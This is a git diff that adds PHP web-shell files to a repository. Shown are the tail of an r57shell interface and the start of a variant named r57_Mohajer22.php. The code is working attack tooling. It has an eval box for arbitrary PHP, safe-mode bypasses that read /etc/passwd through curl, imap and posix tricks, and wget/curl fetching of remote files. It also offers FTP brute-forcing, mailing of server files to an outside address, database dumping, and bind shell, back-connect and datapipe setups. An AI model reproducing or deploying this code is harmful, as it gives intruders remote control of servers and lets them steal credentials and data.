+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on) $select .= '<option>PostgreSQL</option>';
+if($ora_on) $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
+include ($a.$b.$c);
+?>
+
diff --git a/php/r57_Mohajer22.php b/php/r57_Mohajer22.php
new file mode 100644
index 0000000..0fc3204
--- /dev/null
+++ b/php/r57_Mohajer22.php
@@ -0,0 +1,2369 @@
+<?php
+
+
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
+/*  Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
+/*  Âåðñèÿ: 1.3 (05.03.2006)
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  Ãòäåëüíàÿ áëàãîäàðíîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RST/GHC.
+/*  Åñëè ó Âàñ åñòü êàêèå-ëèáî èäåè ïî ïîâîäó òîãî êàêèå ôóíêöèè ñëåäóåò äîáàâèòü â ñêðèïò òî ïèøèòå
+/*  íà rst@void.ru. Âñå ïðåäëîæåíèÿ áóäóò ðàññìîòðåíû.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ Ãàñòðîéêè | Options  ~~~ */
+
+// Âûáîð ÿçûêà | Language
+// $language='ru' - ðóññêèé (russian)
+// $language='eng' - english (àíãëèéñêèé)
+$language='eng';
+
+// Àóòåíòèôèêàöèÿ | Authentification
+// $auth = 1; - Àóòåíòèôèêàöèÿ âêëþ÷åíà  ( authentification = On  )
+// $auth = 0; - Àóòåíòèôèêàöèÿ âûêëþ÷åíà ( authentification = Off )
+$auth = 0;
+
+// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access)
+// ÃÃ… ÇÀÃÓÄÜÒÅ ÑÌÅÃÈÒÜ ÃÃ…ÃÅÄ ÃÀÇÌÅÙÅÃÈÅÌ ÃÀ ÑÅÃÂÅÃÃ…!!! (CHANGE THIS!!!)
+// Ëîãèí è ïàðîëü øèôðóþòñÿ ñ ïîìîùüþ àëãîðèòìà md5, çíà÷åíèÿ ïî óìîë÷àíèþ 'r57'
+// Login & password crypted with md5, default is 'r57'
+$name='7fea0708f4bc4266ab5efcd242028106'; // ëîãèí ïîëüçîâàòåëÿ  (user login)
+$pass='a66abb5684c45962d887564f08346e8d'; // ïàðîëü ïîëüçîâàòåëÿ (user password)
+/******************************************************************************************************/
+if(empty($_POST['Mohajer22'])){
+
+} else {
+$m=$_POST['Mohajer22'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+
+
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+
+
+if ($_POST['plugin'] && ($submit == "Show")){
+                                  $param1 = $_POST[param1];
+                                $param2 = $_POST[param2];
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+                                        case ("/bin/ls"):
+                                                if($param1){$exec = "/bin/ls ". $param1;}
+                                                else{$exec = "/bin/ls";}
+                                                $fp = popen("$exec", "r");
+                                                print $fp;
+                                                pclose($fp);
+                                        break;
+
+                                        case("tempnam"):
+                                                $cmd = $param1;
+                                                $script=tempnam("/tmp", "script");
+                                                $cf=tempnam("/tmp", "cf");
+                                                $fd = fopen($cf, "w");
+                                                fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script");
+                                                fclose($fd);
+                                                $fd = fopen($script, "w");
+                                                fwrite($fd, "rm -f $script $cf; ");
+                                                fwrite($fd, $cmd);
+                                                fclose($fd);
+                                                break;
+
+                                                case("/tmp"):
+                                                $target_file= $param1;
+                                                        if (!$param2){$tmp_file="/tmp/tmp.ghc";}
+                                                        else{$tmp_file = $param2;}
+                                                print copy($target_file, $tmp_file);
+
+                                                $handle = fopen ($tmp_file, "r");
+                                                 while (!feof ($handle)) {
+                                                  $buffer = fgets($handle, 4096);
+                                             echo $buffer;
+                                                  }
+                                                fclose ($handle);
+                                         break;
+
+                                                }
+                                               }
+
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.3";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- Çäðàâñòâóé  Âàñÿ -->
+<html>
+<head>
+<title>MOHAJER22</title>
+<meta http-equiv="Content-Language" content="en-us">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+BACKGROUND-COLOR: #000000;
+COLOR:red;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+BACKGROUND-COLOR:black;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #000000;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #000000 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #000000;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #000000;
+COLOR: #ffffff;
+font: Fixedsys bold;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #993333;
+COLOR: #ffffff;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR:black;
+COLOR: #ffffff;
+width: 40%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #000000;
+COLOR: #ffffff;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+BACKGROUND-COLOR:black;
+COLOR: #ffffff;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:red;TEXT-DECORATION: none}
+</STYLE>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
